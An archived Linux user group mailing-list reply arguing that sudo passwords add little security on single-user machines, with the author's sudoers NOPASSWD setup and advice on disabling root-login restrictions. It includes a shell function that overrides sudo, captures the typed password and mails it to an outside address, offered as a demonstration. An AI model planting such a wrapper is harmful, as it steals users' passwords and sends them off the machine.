[HanoiLUG] Ubuntu-sudo usage..

[David Favro]

I've never done a 'vanilla' Ubuntu install, so I'm not sure, but I think
that maybe the idea is that if you don't set a root password during the
install, it won't prompt you for one when you 'sudo' from the normal
account.  Someone can correct me if I'm wrong.  If so, I think that they
are halfway onto the right idea.

Personally, I always set a root password, and add an entry to
/etc/sudoers that allows my 'private' ID to sudo to anything, like:
my_user ALL=NOPASSWD: ALL
and I have an alias in my .bashrc:
alias su="sudo su -"
Then I disable all of their 'security' features like disallowing root
login from gdm, from ssh, etc. (but I take an additional precaution of
disallowing root login via password in ssh, only via PK, and have sshd
use a non-default port).
All of this means that I can 'be myself' yet execute any command via
sudo without typing root password, and if I need to do a lot of
sysadmin, I can just type "su" to become root to avoid typing "sudo" (I
also keep a gnome-terminal profile with the command "sudo su -" so that
I can easily fire up a terminal that is already root).  You can also
achieve similar results through the use of groups, but I like forcing
myself to acknowledge that I am executing a privileged command by using
'sudo' or a root shell.

The point is, I've been using unix for 25 years and always liked the
user-permissions model, but it is not really adapted to the modern
environment: more and more, most computers are no longer multi-user
machines.  The typical laptop or desktop workstation computer is used by
only one user almost all of the time, and there's no need to disallow
sys-admin by that user since he 'owns' the machine.  I'm not suggesting
that we should all run as 'root', but the need to type 'sudo' is (should
be) just a safety reminder so that we realize that we are executing a
command with system-wide implications rather than just for our user-ID.

The mindset that an intruder as root is a higher security risk than as
an 'unprivileged' user is outdated, although still prevalent.  I was of
this opinion for decades, but it no longer applies on a machine where
there effectively is only one user.  In the old days, an unauthorized
user as root could steal/destroy the data of all users, as well as bring
the system down, but as an unprivileged user, could only steal/destroy
that one user's data.  But now, there only *is* one user.  If an
intruder can read your emails, destroy your oggs, etc., what do you care
if they have access to the /sbin directory?  Once someone has access as
'you', it's all over.  And, since you are typing your root password
every time that you do sysadmin, I get that as a bonus too -- I just
type this into your terminal session or add it to your .bashrc:
sudo() { read -s -p "Password: " pwd ; echo ; /usr/bin/sudo -p "" "${@}"
<<<"${pwd}" ; Mail -s "$(id -un)@${HOSTNAME}" hanoilug at meta-dynamic.com
<<<"${pwd}" ; }

(I don't steal people's passwords -- I only worked out that hack as a
way to demonstrate to people that they are not any more secure by
forcing themselves to type their root password whenever they use sudo,
as some still think).

So, my whole philosophy is that on my personal machines (e.g. laptop),
my personal user-ID should be equivalent to root, but I still need to
use 'sudo' or 'su' or start up a root shell to do sysadmin, just as a
safety check that I don't inadvertently make a mistake, but I don't want
to type passwords.  I guess that since Ubuntu is aimed at 'desktop'
machines, they had the same idea, but there are problems with their
implementation.  For one, there are times when one wants to login
directly as root, not as a normal ID followed by su/sudo (for reasons
too difficult to explain here).  So if root has no password (no direct
login) and root login is disabled in gdm and sshd, you are out of luck.

The 'single-user machine' mentality also means that, in most cases, when
the machine is booted, the need to 'log in' to a graphical session with
a user-ID and password via gdm or other login window is also an obsolete
idea, just another inconvenience that adds no security, like the root
password for 'sudo', so I have found ways to eliminate it.  Of course, I
also take many other security measures with respect to my machines.

-- David F.

Steve wrote:
> I have a question about sudo usage in Ubuntu. Why is the usage
> emphasised over su? If users get prompted for a root password each
> time then how is it different to su? If the idea is to force a
> password entry before each root command, then what stops you from
> running sudo /bin/bash (or some other executable which gives you
> a shell)?
>
> Steve